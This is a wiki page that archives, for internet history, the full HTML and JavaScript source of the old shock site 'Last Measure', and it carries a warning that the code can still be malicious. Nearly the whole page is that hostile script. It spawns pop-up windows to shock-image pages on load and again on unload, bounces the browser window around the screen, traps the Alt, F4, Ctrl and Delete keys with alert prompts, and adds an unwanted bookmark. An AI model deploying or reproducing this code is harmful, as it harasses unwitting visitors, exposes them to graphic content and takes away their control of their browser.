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Last Measure/SourceCode
From Screamer Wiki
LEGAL NOTICE : THIS IS AN ARCHIVE OF A DELETED/OLD OPEN-SOURCE SHOCK SITE CALLED LAST MEASURE. IT HAS BEEN ARCHIVED FOR THE HISTORY OF INTERNET. THIS CODE MAY BE OUTDATED BUT CAN STILL BE MALICIOUS. PLEASE VIEW THE LAST MEASURE ARTICLE TO KNOW MORE ABOUT THIS SHOCK SITE AT THE SCREAMER WIKI (screamer.wiki) ARCHIVE BY: User:TabbyGarf WIKI PAGE : https://screamer.wiki/index.php/Last_Measure CODE OBTAINED FROM : web.archive.org/web/20040203153506/nero-online.org/lastmeasure/ ___________________________ <title>Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, pleae leave immediately</title> </head> <script language="Javascript"> function bookmark() { if ((navigator.appName == "Microsoft Internet Explorer") && (parseInt(navigator.appVersion) >= 4)) { var url="http://web.archive.org/web/20040203153506/http://nero-online.org/lastmeasure/"; var title="Idiot!"; window.external.AddFavorite(url,title); } } function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, pleae leave immediately"); } function ctrlkey() { if (event.keyCode == 17) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, pleae leave immediately"); } function delkey() { if (event.keyCode == 46) alert("Our lawyer has informed us that we need a warning. So, if you are under the age of 18 or find this offensive, pleae leave immediately"); } var xOff = 5; var yOff = 5; var xPos = 400; var yPos = -100; var flagRun = 1; function openWindow(url){ aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=500,height=500,titlebar=no,alwaysRaised=yes'); } function procreate(){ openWindow('pillowfight.php'); openWindow('penisbird.php'); openWindow('tubgirl.php'); openWindow('lemonparty.php'); } function newXlt(){ xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ; window.focus()} function newXrt(){ xOff = Math.ceil(7 * Math.random()) * 5 - 10 ; } function newYup(){ yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ; } function newYdn(){ yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ; } function fOff(){ flagrun = 0; } function playBall(){ xPos += xOff; yPos += yOff; if (xPos > screen.width-175){ newXlt(); } if (xPos < 0){ newXrt(); } if (yPos > screen.height-100){ newYup(); } if (yPos < 0){ newYdn(); } if (flagRun == 1){ window.moveTo(xPos,yPos); setTimeout('playBall()',1); } } </script> <body background="http://web.archive.org/web/20040203153506im_/http://goat.cx/hello.jpg" bgcolor="#ffffff" onload="flagRun=1;procreate();playBall();return true;bookmark();" onkeydown="altf4key();ctrlkey();delkey();" onunload="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> __________________________________________